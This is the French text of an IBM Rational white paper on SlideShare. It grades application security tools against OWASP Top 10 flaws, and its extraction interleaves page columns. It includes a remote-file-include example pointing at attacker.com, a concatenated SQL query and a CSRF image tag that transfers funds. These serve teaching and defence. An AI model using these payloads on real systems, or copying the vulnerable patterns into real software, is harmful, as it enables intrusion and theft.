Rational France livre blanc - choisir le bon outil pour faire du bon travail

  • 530 views
Uploaded on

Un carnet de notes pour les outils de sécurité d’application

Un carnet de notes pour les outils de sécurité d’application

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
530
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
7
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. IBM Software Décembre 2009RationalChoisir le bon outil pourfaire du bon travailUn carnet de notes pour les outils de sécurité d’application
  • 2. 2 Choisir le bon outil pour faire du bon travailSommaire Sommaire (suite) 2 Récapitulatif 13 B2 – Dépassements de la mémoire tampon 2 Choisir le bon outil pour faire du bon travail 14 B3 – Services Web 3 Prévention des vulnérabilités versus détection des 15 B4 – Code malicieux menaces 15 B5 – Cookies personnalisés ou champs masqués 4 Ce qu’il faut mesurer 16 Résumé 4 Le carnet de notes 17 Annexe A : Outils de sécurité d’application – Le carnet 4 A1 – Scripting intersites (XSS) de notes 5 A2 – Failles d’injection Récapitulatif 5 A2.1 – Injection de code SQL standard Dans les années 1980, le scannage de numéros de téléphone et le piratage téléphonique faisaient la une des journaux. Dans les 6 A2.2 – Injection de code XML (XPath, XQuery) 1990, nous avions tous peur des attaques sur le Web et de 6 A2.3 – Injection de protocole LDAP (Lightweight recevoir des virus par courrier électronique. Les sept dernières Directory Access Protocol) années ont vu l’apparition du vol d’identité et des problèmes de confidentialité. Pendant les 20 dernières années, les 6 A2.4 – Injection de commandes organisations se sont concentrées sur la protection du réseau, 7 A2.5 – Injection de code AJAX mais au cours des dix dernières années, il est devenu évident que la menace fondamentale est l’accès au réseau. Le réseau 7 A3 – Exécution de Fichiers Malicieux n’est qu’un moyen pour arriver à une fin. La menace est 8 A4 – Référence directe non sécurisée à un Objet depuis toujours l’accès aux données et aux applications confidentielles ou aux fonctions de l’entreprise qui 9 A5 – Falsification de requête intersite (CSRF) interagissent avec les données. Les données confidentielles et10 A6 – Fuite d’information et Traitement d’erreur les applications d’entreprise sont vulnérables aux attaques, Incorrect surtout en cas d’attaque sur le réseau de l’entreprise.10 A7 – Violation de Gestion Choisir le bon outil pour faire du bon d’authentification et de Session travail11 A8 – Stockage cryptographique non sécurisé Une gamme d’outils de sécurité d’application a été développée pour soutenir les efforts visant à protéger l’entreprise contre11 A9 – Communications non sécurisées les risques liés aux applications non sécurisées. Mais dans le12 A10 – Manque de Restriction d’Accès URL paysage de la sécurité applicative en constante mutation, comment les organisations peuvent-elle choisir le bon12 B1 – Configuration du moteur d’exécution de ensemble d’outils pour atténuer les risques posés à leur l’application environnement par leurs applications ? De même, comment, où et par qui ces outils sont-ils utilisés le plus efficacement ?
  • 3. IBM Software 3Ce document de présentation technique étudie les outils les capables de bloquer un certain pourcentage du trafic suspect,plus courants dans l’environnement de la sécurité des mais il existe une nette différence entre les dispositifs deapplications d’entreprise : détection et les dispositifs de prévention proprement dits.● Pare-feu d’application Web Une bonne solution de prévention des vulnérabilités est● Outils d’analyse d’application Web capable de trouver et d’aider à éliminer un point faible de● Outils d’analyse de code source sécurité avant que cette faiblesse puisse être exploitée concrètement. Les pare-feu d’application Web ne sont pas deChaque outil est évalué et comparé en termes de résolution bons dispositifs de prévention. Ils réagissent au trafic Webdes vulnérabilités critiques, en commençant par le entrant qui exploite les vulnérabilités existantes. La prévention10 vulnérabilités prioritaires identifiées par l’OWASP (Open réelle ne se produit que lorsque la vulnérabilité estWeb Application Security Project). Ce document fournit un véritablement éliminée et ne peut donc plus être exploitée.carnet de notes pour aider les organisations qui définissentleur stratégie de sécurité d’application à mieux comprendre Les outils d’analyse d’application Web et les outils d’analysel’approche de chaque outil, sa méthode de résolution des de code source sont fondamentalement des solutions dedéfauts de sécurité et son efficacité en matière d’élimination prévention. Les outils d’analyse d’application et les outilsdes menaces de sécurité sur les données dans les applications. d’analyse de code sont utilisés avant que les vulnérabilités soient exposées au Web. Ils permettent d’éliminer les risquesPrévention des vulnérabilités versus de manière définitive. Cependant, ces outils ne fournissent pasdétection des menaces de mécanismes de détection des menaces dansIl existe deux catégories fondamentales rassemblant tous les l’environnement quotidien déployé.produits de sécurité d’application : la prévention desvulnérabilités versus la détection des menaces. Il convient de Il existe une limite aux informations qu’un outil (de détectionsouligner que pour les besoins de ce document, lorsque les ou de prévention) peut posséder sans étudier et comprendre lefonctionnalités d’un produit permettent la prévention par la code source sous-jacent. Comme pour toute méthodologiedétection, ce produit est considéré comme un dispositif de d’évaluation manuelle de la sécurité logicielle, plus vousdétection. effectuez de tests de sécurité du code source des applications statiques, plus vous obtenez d’informations. Il y a aussi unLes entreprises essaient de gérer une stratégie préventive équilibre entre le temps dont vous disposez pour étudier laproactive versus une stratégie plus réactive basée sur la situation d’une application en termes de sécurité et ladétection. Nous insistons sur le fait qu’aucune pratique de combinaison appropriée d’approches automatisées etsécurité d’application ne peut atteindre un niveau de réussite manuelles. Certains mécanismes de détection sont bienacceptable sans implémenter les deux mécanismes (prévention adaptés aux protections immédiates à court terme.et détection). Trouver le bon équilibre et le bon investissementest une décision qui appartient à chaque organisation, selon les Par exemple, vous avez identifié un grand nombre demenaces, l’exposition et le budget. vulnérabilités par une approche de prévention des vulnérabilités (analyse statique), mais vous ne pouvez pasLes pare-feu d’application Web sont un dispositif de détection toutes les corriger immédiatement car vous n’avez pasdes menaces. Le rôle principal d’un pare-feu est de détecter et suffisamment de temps ni de ressources pour le faire. Vousde bloquer les requêtes non valides ou malicieuses envoyées appliquez une solution à court terme comme un pare-feuà votre application Web. On pourrait aussi dire que les d’application Web, une définition de règles hautementpare-feu sont des dispositifs de prévention. Les pare-feu sont personnalisée, jusqu’à ce que le code soit corrigé et vérifié en effectuant une analyse de code source.
  • 4. 4 Choisir le bon outil pour faire du bon travailCe qu’il faut mesurer chaque outil en la matière. Cette évaluation vous permet dePour établir une comparaison précise et juste entre ces déterminer la combinaison d’outils et de processus detechnologies, ce document de présentation technique compare protection contre les menaces critiques offrant la méthode lales outils à l’aide des 10 vulnérabilités prioritaires définis par plus appropriée pour votre organisation.l’OWASP comme les défauts de sécurité les plus critiques(http://www.owasp.org/index.php/ OWASP Top_Ten_Project). Le carnet de notesCe document évalue cinq vulnérabilités critiques Chaque outil dans chaque catégorie de vulnérabilité a reçu unesupplémentaires pour compléter les catégories de comparaison note graphique en plus d’une explication plus détailléepour le référentiel. concernant sa capacité à résoudre la vulnérabilité. Les notes sont regroupées dans un bulletin final à la fin de chaque● A1 – Scripting intersites (XSS) rapport. Les notes sont les suivantes :● A2 – Failles d’injection● A3 – Exécution de fichiers malicieux● A4 – Référence directe non sécurisée à un Objet Capacité à résoudre la Note● A5 – Falsification de requête intersite (Cross-site vulnérabilité request forgery) Excellente● A6 – Fuite d’information et Traitement d’erreur Incorrect Bonne● A7 – Violation de Gestion d’authentification et de Session Moyenne● A8 – Stockage cryptographique non sécurisé Aucune● A9 – Communications non sécurisées● A10 – Manque de Restriction d’Accès URL A1 – Scripting intersites (XSS) Le scripting intersites est une des attaques prédominantesL’OWASP fournit des informations pour identifier les risques contre les applications Web. Pour le pirate, cette méthodeassociés à l’environnement d’application Web actuel. présente en grande partie les mêmes avantages que leCependant, aucune pratique de sécurité des applications ne dépassement de la mémoire tampon. Elle est relativementdoit exclure des débats pour identifier et atténuer également facile à implémenter et peut faire en sorte que le navigateurles risques associés aux catégories suivantes. du client émette du code de scripting arbitraire du côté client contrôlé par le pirate. Le but final d’une attaque XSS est de● B1 – Configuration du moteur d’exécution de l’application prendre en otage une session d’application d’un utilisateur● B2 – Dépassements de la mémoire tampon existant ou de lancer une attaque d’hameçonnage (ou● B3 – Services Web phishing).● B4 – Code malicieux● B5 – Cookies personnalisés ou champs masqués Les outils les plus efficaces soulignent les paramètres d’entrée vulnérables aux attaques XSS et déterminent les emplacementsPour déterminer comment chaque outil de sécurité spécifiques dans le code d’application où réside le coded’application identifie et atténue les menaces pour chaque vulnérable. Les meilleurs outils détectent et empêchentcatégorie de vulnérabilité, nous devons identifier la méthode le scripting intersites avec une configuration personnaliséeidéale pour aborder la vulnérabilité elle-même et comment minimum.chaque outil de sécurité d’application identifie et atténue lesmenaces. Ce document fournit une évaluation de l’efficacité de
  • 5. IBM Software 5 A2.1 – Injection de code SQL Analyse de code Pare-feu Outil d’analyse source d’application Web d’application Web L’injection de code SQL est une technique qui consiste à injecter des commandes SQL dans la base de données par l’utilisateur pour obtenir les commandes émises par L’analyse de code Les pare-feu Les outils d’analyse source fournit des d’application Web d’application Web l’interprète SQL. Parfois, il faut plusieurs itérations de chaînes informations sont uniquement sont uniquement d’attaque pour finalement construire une chaîne de code SQL détaillées pour capables de fournir capables de fournir correctement formatée, ce qui déclenche une attaque par éliminer la l’URL exploitable et l’URL exploitable et injection de code SQL. Lorsque l’application renvoie des vulnérabilité, y les paramètres les paramètres compris la ligne de utilisés pour exploiter utilisés pour exploiter détails concernant l’erreur dans la base de données qui code où la la faille. La plupart la faille. Pour trouver permettent au pirate de perfectionner la syntaxe, on parle vulnérabilité se des pare-feu tous les champs de généralement d’injection de code SQL normale. L’injection trouve. d’application Web formulaire injectables, nécessitent des une personnalisation de code SQL aveugle fait généralement référence aux cas où règles personnalisées selon l’utilisateur peut l’application ne fournit pas de détails sur l’erreur mais renvoie pour couvrir les être nécessaire. un message d’erreur générique à la place. Le pirate doit alors attaques XSS les plus basiques. exécuter une série de requêtes pour essayer de provoquer une réponse positive et négative de la part de l’application. Souvent, le pirate est capable d’interpréter les messagesA2 – Failles d’injection d’erreur envoyés directement depuis la base de donnéesLes failles d’injection représentent une des attaques (injection de code SQL normale), mais il n’est pas nécessaireprédominantes contre les applications Web aujourd’hui. de réussir ce type d’attaque par le biais d’une injection de codeLe point commun entre toutes les attaques par injection SQL aveugle. Au lieu de cela, le pirate peut itérer par uneréside dans le fait qu’il existe quelque part dans le code série de tentatives d’injection de code SQL jusqu’à réussir sonsource un interprète qui prend les données et les traite sous attaque. Quoi qu’il en soit, le risque et le résultat des attaquesforme de code. Lorsque les données passent sans être validées réussies sont les mêmes pour l’injection aveugle et l’injectioncorrectement, un utilisateur malicieux peut injecter du code normale.malicieux dans cet interprète. Le but est souvent l’acquisitionou la destruction de données confidentielles. Analyse de code Pare-feu Outil d’analyse source d’application Web d’application WebUne injection de code SQL est le type de défauts d’injectionle plus courant. Lors d’une injection de code SQL, le pirate L’analyse de code Les pare-feu Les outils d’analyseinsère des données par le biais de n’importe quel champ source fournit des d’application Web d’application Webd’entrée accessible par l’utilisateur pour que ces données informations sont uniquement peuvent détecter unesoient interprétées par la base de données comme du texte de détaillées pour capables de fournir injection de code éliminer la l’URL exploitable et SQL. Les méthodescommande SQL supplémentaire. Cependant, il existe des vulnérabilité, y les paramètres utilisées ont un tauxformes essentiellement illimitées de cette attaque. Les compris la ligne de utilisés pour exploiter faussement positifapplications Web autorisent les entrées contrôlables par code où la la faille. La plupart très élevé.l’utilisateur sans valider les entrées. Les données sont presque vulnérabilité se des pare-feu trouve. d’application Webtoujours exposées à un type de vulnérabilité par injection. Les nécessitent desmeilleurs outils suivent et mettent en évidence tous les points règles personnaliséesd’entrée d’une application et surtout tous les endroits où des pour bloquer les attaques les plusentrées d’utilisateur existent. basiques.
  • 6. 6 Choisir le bon outil pour faire du bon travailA2.2 – Injection de code XML (XPath et XQuery) A2.3 – Injection LDAPXPath et XQuery permettent d’interroger des documents Le protocole LDAP est souvent utilisé dans les entreprisesXML. XQuery fournit des stockages de données relationnels pour la gestion des comptes clients, l’authentification et mêmepour les informations contenues à l’intérieur. C’est pour cette l’autorisation. Si votre application Web utilise le protocoleraison que XPath et XQuery sont vulnérables aux attaques LDAP, alors vos outils d’analyse d’application doivent êtreutilisant les mêmes techniques qu’une injection de code SQL. capables de comprendre ce protocole. L’injection LDAP seOn peut considérer les injections de code XML simplement produit lorsque des données non validées fournies par uncomme une autre attaque par injection où le stockage de utilisateur sont utilisées dans la construction de requêtes ou dedonnées est en fait un fichier XML et non une base de filtres LDAP. Il se peut que le système LDAP permette àdonnées. Il faut prendre en compte l’emplacement du fichier l’utilisateur malicieux d’interroger le système LDAP sous-XML et le type de données qu’il contient lorsqu’on étudie les jacent et d’accéder aux données contenues dans le système.risques associés aux injections de code XML. L’injection XMLdevient plus courante en raison de l’utilisation plus répandue Même si cette attaque est très courante, si votre application estdes services Web, qui reposent en grande partie sur le vulnérable, elle est aussi grave que n’importe quelle autretraitement des flux de données XML. L’injection XML est attaque par injection. Il est essentiel de comprendre les APIdifficile à découvrir automatiquement à l’aide des pare-feu utilisées et la provenance des données utilisées par les APId’application ou des outils d’analyse d’application Web sans pour assurer une couverture précise et complète.intervention manuelle. Les outils d’analyse d’application Websouffrent du fait qu’il s’agisse souvent d’un test à l’aveugle, Analyse de code Pare-feu Outil d’analysesans informations sur les API, ce qui accroît considérablement source d’application Web d’application Weble taux faux positif. Il est essentiel de comprendre lesAPI utilisées et la provenance des données transmises aux APIpour assurer une couverture précise et complète. L’analyse de code Les pare-feu Les outils d’analyse source fournit des d’application Web d’application Web informations sont uniquement sont uniquement détaillées pour capables de fournir capables de fournir Analyse de code Pare-feu Outil d’analyse éliminer la l’URL exploitable et l’URL exploitable et source d’application Web d’application Web vulnérabilité, y les paramètres les paramètres compris la ligne de utilisés pour exploiter utilisés pour exploiter code où la la faille. La plupart la faille. Pour trouver L’analyse de code Les pare-feu Les outils d’analyse vulnérabilité se des pare-feu tous les champs de source peut fournir d’application Web d’application Web trouve. d’application Web formulaire injectables des informations sont uniquement sont uniquement nécessitent des et pour obtenir une détaillées pour capables de fournir capables de fournir règles personnalisées manipulation LDAP éliminer la l’URL exploitable et l’URL exploitable et pour couvrir les adaptée, une vulnérabilité, y les paramètres les paramètres attaques LDAP les personnalisation compris la ligne de utilisés pour exploiter utilisés pour exploiter plus basiques. selon l’utilisateur peut code où la la faille. Tous les la faille. Pour trouver être nécessaire. vulnérabilité se pare-feu d’application tous les champs de trouve. Web ne prennent pas formulaire injectables, en charge l’examen une personnalisation des flux de données selon l’utilisateur peut A2.4 – Injection de commandes XML. Une passerelle être nécessaire. L’injection de commandes est un des types de vulnérabilités XML séparée est recommandée dans par injection les plus graves. Elle permet aux pirates d’exécuter certains cas. des commandes système arbitraires, généralement à un niveau de privilèges élevé. La réussite de cette attaque ne fournit
  • 7. IBM Software 7généralement pas beaucoup de retours d’informations à Analyse de code Pare-feu Outil d’analysel’utilisateur. Il est difficile de déterminer si une attaque source d’application Web d’application Weba réussi ou échoué. L’analyse de code Les pare-feu Les outils d’analyse source peut d’application Web ne d’application Web Analyse de code Pare-feu Outil d’analyse déterminer les font pas de utilisés avec des source d’application Web d’application Web endroits où les distinction entre les outils d’analyse données contrôlables requêtes AJAX et les statiques offrent la par l’utilisateur requêtes HTTP. Les meilleure détection et La manière la plus Les pare-feu Les outils d’analyse doivent être validées requêtes AJAX sont la meilleureefficace de trouver et d’application Web d’application Web (et ne le sont pas) purement basées sur protection. d’empêcher les offrent un certain sont uniquement mais termine toujours le client (requêteattaques par injection niveau de protection capables de fournir par les données du inter-domaines par de commandes. contre une injection l’URL exploitable et côté client. Dans cet utilisation d’un proxy). Chaque commande de commande les paramètres espace, la plupart Bon nombre de cesde système émise est connue. La prise en utilisés pour exploiter des solutions ne font requêtes sont identifiée. Les charge est limitée car la faille. Pour trouver pas de distinction invisibles pour le données de il faut savoir à tous les champs de entre les requêtes serveur. l’utilisateur sont l’avance que le formulaire injectables, AJAX et les requêtesutilisées et le texte de champ est vulnérable une personnalisation HTTP normales.commande est suivi. aux injections et limité selon l’utilisateur peut aux entrées être nécessaire. Il est spécifiques au Web. très difficile de savoir Les autres interfaces si l’attaque a réussi A3 – Exécution de fichiers malicieux à un système dorsal ou échoué car L’exécution de fichiers malicieux est un modèle d’attaque très qui ne s’appuient pas l’émission de la sur le Web sont tout commande sur le courant pour les applications php. Ce genre d’attaque permet de même système externe est à un attaquant de télécharger le contenu interprété ou émis vulnérables. souvent abstraite et par une application hôte. Cela peut conduire à compromettre inconnue au niveau de l’interface un serveur Web complet, à défaire le site Web et à installer un utilisateur. root kit ainsi que de nombreuses autres failles étant donné que le code fourni par le pirate est exécuté sur le système vulnérable.A2.5 – Injection de code AJAXL’injection de code AJAX est un type d’attaque relativement Une forme simple de ce type d’attaque est décrite ci-dessous :nouveau qui n’est pas très courant, mais comme l’utilisationd’AJAX est de plus en plus répandue, ce type d’attaque <?php include($hidden_user_skin).’’skins’’.’’php’’); ?>pourrait devenir dangereux. Une injection AJAX est uneinjection côté client basée sur un cadre de référence JavaScript Dans cet exemple, le serveur Web personnalise l’expérience deet XML. L’application côté serveur chargée de traiter ces l’utilisateur en utilisant un paramètre masqué pourrequêtes traite la requête d’injection AJAX comme une sélectionner l’habillage choisi par l’utilisateur. Si un piraterequête HTTP GET ou POST normale. La cause de la modifie le champ masqué $hidden_user_skin pourplupart des problèmes de sécurité liée aux technologies AJAX http://attacker.com/exploit.php?, il fait en sorte que le serveurest la tendance croissante des développeurs à stocker de plus Web exécute du code arbitraire contrôlé par le pirate. Ce codeen plus de données, souvent sensibles du côté client, sans malicieux est chargé à partir d’un emplacement contrôlé par lequ’ils se rendent compte que toutes ces données et pirate et exécuté sur le serveur de la victime.fonctionnalités sont accessibles à l’utilisateur malicieux.Ce problème se manifeste lorsque l’application stocke des Tous les outils associés à cette catégorie de résultats doiventdonnées sensibles sur une charge de réponse côté client et articuler tous les endroits où les entrées de l’utilisateur sontqu’un défaut XSS accède à ces données et les transmet au directement référencées sans validation appropriée.pirate. Il faut faire attention aux données stockées sur le clientet au type de fonctions exposées du côté client.
  • 8. 8 Choisir le bon outil pour faire du bon travail Analyse de code Pare-feu Outil d’analyse S’il s’agissait d’une requête pour récupérer les informations du source d’application Web d’application Web compte d’un utilisateur spécifique, il suffirait au pirate de modifier le paramètre d’identification de l’utilisateur. L’analyse de code Les pare-feu Les outils d’analyse source peut d’application Web d’application Web Si le code côté serveur est codé comme suit : déterminer les peuvent identifier ce utilisés avec des endroits où les type d’attaque. outils d’analyse String userId = request.getParameter(‘‘userId)’’;données contrôlables Toutefois, ces règles statiques offrent la par l’utilisateur doivent être adaptées meilleure détection et String query = ‘‘SELECT * FROM users WHEREdoivent être validées, à chaque application la meilleure userId=’’’+userId +‘‘’’’; mais toutes les Web. Les pare-feu protection. solutions dans cet d’application Web Le code côté serveur est potentiellement vulnérable à une espace ne prennent n’offrent pas unepas encore en charge protection universelle injection de code SQL mais, même si la requête sous-jacente le langage PHP contre toutes les utilise des requêtes paramétrées, le pirate peut obtenir les (Support Hypertext formes de cette informations de compte de n’importe quel utilisateur dans le Preprocessor). Dans attaque.les cas où PHP n’est système.pas officiellement pris en charge comme Comme dans A3, il faut que la solution puisse identifier touslangage, il est parfois possible de définir les endroits qui récupèrent les entrées et suivre ces entrées des règles d’analyse jusqu’à leur destination finale pour pouvoir identifier ce type basées sur un d’attaque de manière fiable. modèle pour rechercher ces vulnérabilités potentielles. Analyse de code Pare-feu Outil d’analyse source d’application Web d’application WebA4 – Référence directe non sécurisée à un Objet L’analyse de code Les pare-feu Les outils d’analyseLorsqu’une application expose volontairement ou source peut d’application Web d’application Web déterminer tous les peuvent identifier ce utilisés avec desinvolontairement l’accès aux références d’objets internes, cela endroits où des type d’attaque. outils d’analyseentraîne l’exposition des données. Cela se produit lorsque les données contrôlables Cependant, ces statiques offrent laclés primaires d’une base de données sont exposées sous la par l’utilisateur règles doivent meilleure détection et doivent être validées. généralement être la meilleureforme de paramètres d’entrée fournis par l’utilisateur. Souvent, Si vous utilisez adaptées à chaque protection. Les outilsles utilisateurs malicieux profitent de ces attaques pour accéder l’analyse et la application Web et d’analyseà des données non autorisées, représentées par tout objet visualisation du flux elles n’offrent pas une d’application Webdirect référencé. Selon les meilleures pratiques de sécurité, il de données, vous protection universelle nécessitent savez où les données contre toutes les généralement unene faut jamais utiliser directement les clés de base de données arrivent. L’analyse formes de cette manipulationpour référencer des objets. Il est préférable d’utiliser une souligne attaque. Les meilleurs manuelle desmappe relative d’identifiants, qui font référence aux données spécifiquement les pare-feu d’application paramètres d’entrée zones vulnérables. permettent d’identifier des applications pouruniquement dans le contexte de l’utilisateur. la valeur et le type détecter ce type d’une plage d’attaque.Voici un exemple : spécifique en forçant l’acceptation des paramètres et valeurshttp://bobs.shopping.com/accountInfo.jsp?userId=5 valides uniquement.
  • 9. IBM Software 9A5 – Falsification de requête intersite (CSRF) Par exemple, si le site malicieux envoie à Alice :Falsification de requête intersite (CSRF) est une attaquedévastatrice basée sur la relation de confiance existant entre <img src=‘‘https://trusted.banksite.com/transferFunds?une application et un client. La plupart du temps, si une FromAccount= [alices_account_number]&amount=1000&application n’a pas pris de mesures spécifiques pour empêcher toAccount= [attacker_account_number]’’>la CSRF, elle est probablement vulnérable à ce type d’attaque. Alice risque de transférer de l’argent sur le compte du pirate. Il est important de comprendre qu’aucun outil n’est expert en matière d’identification des CSRF, même si leur capacité à détecter les attaques XSS peut les aider à identifier les risques 3. Le pirate utilise la confiance établie de CSRF. Toutefois, ce facteur à lui seul n’est pas suffisant, car envers le site Web légitime pour transférer des fonds hors du compte dAlice les CSRF peuvent exister sans XSS et les attaques XSS peuvent exister sans CSRF. Les vulnérabilités XSS rendent la protection contre les CSRF plus difficile. 1. Connexion Analyse de code Pare-feu Outil d’analyse source d’application Web d’application Web 2. Visite L’identification des Les pare-feu Même si les outils Alice attaques XSS aide à d’application Web d’analyse Web identifier les CSRF. peut apporter des assurent la détection Mais la détection fonctionnalités des CSRF sans n’est pas suffisante permettant de réduire modification, le faible pour garantir la le risque de CSRF, taux faussement détection totale des comme la validation positif pour les CSRF. Le soutien du référent HTTP, le attaques XSS facilite apporté par l’analyse forçage des l’identification des de code source est formulaires et le vecteurs d’attaques limité. chiffrement des CSRF potentielles. paramètres, ainsi que Une combinaisonDans ce scénario, la victime (Alice) se connecte à son compte d’autres techniques. d’analyse Web, debancaire et, sans se déconnecter, visite un site malicieux qui La capacité de tests manuels etprofite de la relation de confiance qui existe entre Alice et son protection dépend du d’analyse fournisseur et doit d’application Webcompte bancaire. En incluant une simple requête, qu’Alice ne être configurée constitue la meilleurepeut pas voir, à chaque fois qu’elle visite le site malicieux le manuellement selon approche pourpirate qui envoie la requête peut accéder au compte d’Alice l’environnement. identifier ces types d’attaques.comme s’il était Alice.
  • 10. 10 Choisir le bon outil pour faire du bon travailA6 – Fuite d’information et Traitement d’erreur Incorrect A7 – Violation de Gestion d’authentification et de SessionLes fuites d’informations et le traitement d‘erreurs incorrect L’absence de contrôles d’authentification et de gestion desont des problèmes bien plus graves que beaucoup session adaptés dans une application entraîne de nombreusesd’organisations le pensent. Un élément aussi banal qu’un vulnérabilités graves, comme le piratage de session etmessage d’erreur peut fournir à un pirate exactement les l’élévation des privilèges. Dans les applications Web, ne pasinformations dont il a besoin pour perfectionner son attaque, valider l’utilisateur pendant la session permet à un utilisateurque ce soit la version de la base de données utilisée, une trace d’accéder aux zones de l’application réservées à une autrede pile révélant des informations sensibles ou des fichiers personne possèdent un niveau de privilèges différent oujournaux contenant des messages de débogage avec des supérieur.données sensibles qui peuvent persister pendant des décennies.Le piratage de CardSystems, Inc.© en 2005 en est un parfait Le meilleur moyen d’identifier un processus d’authentificationexemple. Ce cas a montré que des données sensibles étaient interrompu est la combinaison de tests manuels et l’analyse dujournalisées pour déboguer des transactions non autorisées ou code source. Les analyses de code source aident à identifierincomplètes. Le pirate a réussi à récupérer ces données, tous les points d’entrée d’une application Web et à vérifier queexposant ainsi 40 millions de dossiers. Il convient de souligner l’utilisateur est autorisé, tandis que les tests manuels utilisentqu’aucun outil d’analyse d’application Web ni pare-feu les résultats de l’analyse de code source pour concentrer lesd’application Web ne peut détecter cette attaque. Seule une attaques non seulement sur les zones avec autorisation pouranalyse de code source qui identifie toutes les sorties peut vérifier qu’elles sont correctes, mais aussi les zones sansdétecter la vulnérabilité à résoudre. autorisation pour vérifier que la conception est bonne. L’analyse du code source identifie les API liées à l’authentification et à la gestion de session, en orientant Analyse de code Pare-feu Outil d’analyse rapidement l’expert en sécurité vers les endroits où le code source d’application Web d’application Web doit être analysé manuellement. L’analyse du code Les pare-feu Les outils d’analyse source est capable d’application Web d’application Web Analyse de code Pare-feu Outil d’analyse de fournir une apportent une apportent une plus source d’application Web d’application Web couverture complète certaine fonctionnalité grande valeur que les contre la gestion en interprétant et en pare-feu d’application incorrecte des interceptant les Web. Ils interprètent L’analyse de code Les pare-feu Les outils d’analyse erreurs, car souvent, messages d’erreur de nombreux types source peut être d’application Web ne d’application Web nela gestion des erreurs (dans la réponse) d’erreurs renvoyés utilisée pour identifier sont pas efficaces sont pas efficacesn’est pas entièrement envoyés par par les applications les points d’entrée de pour atténuer les dans cette catégorie. envoyée directement l’application, mais ils Web, mais ils sont l’application et, à risques Ils peuvent être utiles à l’utilisateur d’une ne sont pas très strictement limités l’aide de règles d’authentification et lorsqu’ils sont application Web. efficaces en termes aux erreurs qui sont personnalisées, elle d’autorisation, mais employés comme de valeur réelle pour renvoyées à peut aider à vérifier ils apportent de la moteur de test ce type de risque. l’utilisateur. que les contrôles valeur en matière de manuel couplé aux d’autorisation sont suivi et de sécurité résultats de l’analyse effectués. des données de de code source. Cependant, en tant session, surtout que technologie lorsqu’ils sont utilisés isolée, elle ne suffit comme proxy pas à vérifier que les inversé. contrôles d’autorisation existants ne sont pas eux-mêmes interrompus.
  • 11. IBM Software 11A8 – Stockage cryptographique non sécurisé Les outils d’analyse d’application Web peuvent être utilisésLa cryptographie est une technologie importante dans toutes pour vérifier que le protocole SSL est utilisé en applicationles applications chargées de stocker et de gérer des données frontale, mais ils manquent de visibilité en ce qui concerne lessensibles. Une application qui doit être conforme à la norme connexions dorsales éventuelles entre les systèmes. L’analysePCI doit gérer la transmission et le stockage sécurisés de de code source peut identifier de nombreuses connexionsdonnées sensibles. Une mauvaise utilisation du chiffrement ou dorsales, mais elle ne prend pas suffisamment en compte lal’utilisation d’un chiffrement faible peut entraîner une logique d’entreprise pour déterminer si ces connexions doiventdivulgation d’informations très sérieuses. être sécurisées ou sont mal sécurisées. Pour ces types de problèmes, une combinaison d’outils d’analyse d’applicationSeule l’analyse de code source peut aider à découvrir et Web et d’analyse de code source constitue la meilleureatténuer les vulnérabilités liées aux contrôles cryptographiques stratégie. Les pare-feu d’application Web n’apportentinadaptés. Ils peuvent être inadaptés en raison de l’utilisation réellement aucun avantage lorsqu’il s’agit de réduire ced’une routine de chiffrement faible, ou il se peut que la type de risque.routine utilisée soit contraire à la politique de l’entreprise.Elle peut aussi identifier les endroits où la cryptographie est Analyse de code Pare-feu Outil d’analyseutilisée pour orienter un analyste vers les zones où une analyse source d’application Web d’application Webde code assistée plus rigoureuse est nécessaire. L’analyse de code Les pare-feu Les outils d’analyse Analyse de code Pare-feu Outil d’analyse source peut être d’application Web d’application Web source d’application Web d’application Web utilisée pour identifier peuvent assurer un peuvent aider les les points de sortie certain niveau de analystes à identifier d’une application et protection pour le les problèmes de L’analyse de code Les pare-feu Les outils d’analyse pour orienter un protocole SSL et SSL danssource peut identifier d’application Web d’application Web analyste qui connaît avec des règles l’application frontale, l’utilisation de sont complètement sont complètement l’application vers un personnalisées mais ils manquent de contrôles inefficaces lorsqu’il inefficaces lorsqu’il manque de contrôles capables d’appliquer visibilité en ce quicryptographiques peu s’agit d’identifier une s’agit d’identifier une de chiffrement SSL. Pour ce faire, il concerne les efficaces et aider mauvaise utilisation mauvaise utilisation adaptés. Cependant, faut que le pare-feu connexions dorsales l’analyste à identifier des contrôles des contrôles en tant que fonctionne comme un pour être efficaces les endroits où des cryptographiques. cryptographiques. technologie isolée, proxy, ce qui réduit utilisés seuls.contrôles valides sont elle ne suffit pas à les performances. mal utilisés. vérifier que tous les points de sortie qui doivent être chiffrés sont chiffrésA9 – Communications non sécurisées correctement.Les communications non sécurisées font principalement L’analyse de code peut aussi identifierréférence à l’utilisation du protocole SSL (secure sockets l’utilisation delayer) pour chiffrer des informations sensibles entre le client certaines API qui(généralement un navigateur Web) et l’application Web. Cela sécurisent les communicationsest extrêmement important pour s’assurer que les données réseau, fournissantsensibles ne sont pas transmises sans être chiffrées, surtout les ainsi aux analystesdonnées d’authentification des utilisateurs et les informations une aide à lapersonnelles identifiables. vérification supplémentaire.
  • 12. 12 Choisir le bon outil pour faire du bon travailA10 – Manque de Restriction d’Accès URL Analyse de code Pare-feu Outil d’analyseDe nombreuses applications Web limitent l’accès aux pages source d’application Web d’application Websimplement en appliquant une autorisation au niveau de lacouche de présentation, ce qui signifie que l’application ne L’analyse de code Les pare-feu Les outils d’analysepeut pas restituer certains liés protégés aux utilisateurs non source peut être d’application Web d’application Web ontautorisés. Cependant, les utilisateurs qui tentent d’accéder utilisée pour identifier peuvent dans du mal à identifier lesmanuellement à ces URL contournent les contrôles toutes les pages certains cas forcer pages non liées ou pouvant être l’authentification des les pages généréesd’autorisation au niveau de la couche de présentation. Il est visualisées, même utilisateurs pour dynamiquement. Ilsimportant d’effectuer des autorisations déclaratives ou celles qui ne sont pas certaines pages, mais peuvent les manquer,programmatiques au niveau de couche métier en plus de liées directement. ce n’est mais si ces pagesl’autorisation au niveau de la couche de présentation. Cette technologie ne généralement pas le sont connues, la peut pas identifier les meilleur endroit pour plupart des outilsGénéralement, l’autorisation de la couche de présentation est pages générées exécuter ce type de d’analyse peuventuniquement destinée à des fins de convivialité, pas de sécurité. dynamiquement et contrôle. être configurés pourLes utilisateurs capables de deviner l’URL ont un accès non elle ne peut pas analyser ces pages garantir que les manuellement. 